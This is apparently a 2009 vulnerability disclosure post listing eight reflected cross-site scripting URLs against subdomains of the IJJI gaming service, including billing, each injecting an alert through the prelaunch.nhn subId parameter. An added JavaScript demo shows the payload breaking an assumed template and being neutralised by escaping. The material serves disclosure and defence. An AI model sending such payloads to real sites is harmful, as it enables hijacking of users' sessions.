Global Pre-Launch [BONUS2]

13 August 2009

Type: Non-persistent
Criteria: None

This post continues the disclosure of prelaunch.nhn script vulnerabilities across all subdomains of the IJJI service. We finish today with 8 more, bringing the total to 17 copies of the same script.

10) Miscellaneous

http://misc.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

11) Bulletin Board System

http://bbs.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

12) Channel

http://channel.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

13) Billing

http://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

14) HTTPS Billing

https://billing.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

15) Facebook

http://facebook.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

16) Message

http://message.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

17) Avatar

http://avatar.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//

It is important to note that if the launcher plugin is installed for either IE or Firefox then one of the following will occur:

If the user is authenticated, they will be alerted:

This channel does not exist

If the user is not authenticated, then they will be redirected to login (there is a timed delay with Firefox).
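
The subId value in the URLs above closes a single-quoted JavaScript string, the enclosing call and the enclosing function, then reopens `init()` to absorb the rest of the script. The following is an added example, not code from the original post or from the IJJI site: it renders that payload into an assumed template raw and then escaped. The template shape, `launchChannel`, and the subId format in `isValidSubId` are assumptions inferred from the payload.

```javascript
// Payload taken from the URLs above, with the subId value URL-decoded.
const PAGE_PAYLOAD = decodeURIComponent(
  "%27);}alert(%27xss%27);function%20init(){return;//");

// ASSUMED template: the prelaunch.nhn source is not shown in the post.
// launchChannel is a hypothetical name for the call that receives subId.
const template = (subId) =>
  `function init(){ launchChannel('${subId}');\n}\ninit();`;

// Vulnerable rendering: raw interpolation into a single-quoted JS string.
const renderVulnerable = (subId) => template(subId);

// Hardened rendering: every character outside [A-Za-z0-9] becomes \uXXXX,
// so the value cannot close the string, the call, or the function body.
function jsStringEscape(value) {
  return String(value).replace(/[^A-Za-z0-9]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}
const renderHardened = (subId) => template(jsStringEscape(subId));

// Stricter input check. ASSUMPTION: a subId is a short alphanumeric id;
// the post does not state its real format.
const isValidSubId = (subId) => /^[A-Za-z0-9_-]{1,32}$/.test(subId);

// Evaluate a rendered script with stubbed alert/launchChannel and record
// which of them the script actually called.
function run(script) {
  const seen = { alerts: [], launched: [] };
  new Function("alert", "launchChannel", script)(
    (msg) => seen.alerts.push(msg),
    (id) => seen.launched.push(id));
  return seen;
}

console.log("vulnerable:", run(renderVulnerable(PAGE_PAYLOAD)));
console.log("hardened:  ", run(renderHardened(PAGE_PAYLOAD)));
console.log("allowlist accepts payload:", isValidSubId(PAGE_PAYLOAD));
```

In the raw rendering the stubbed `alert` fires and `launchChannel` is never reached; in the escaped rendering the whole payload arrives at `launchChannel` as inert string data.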
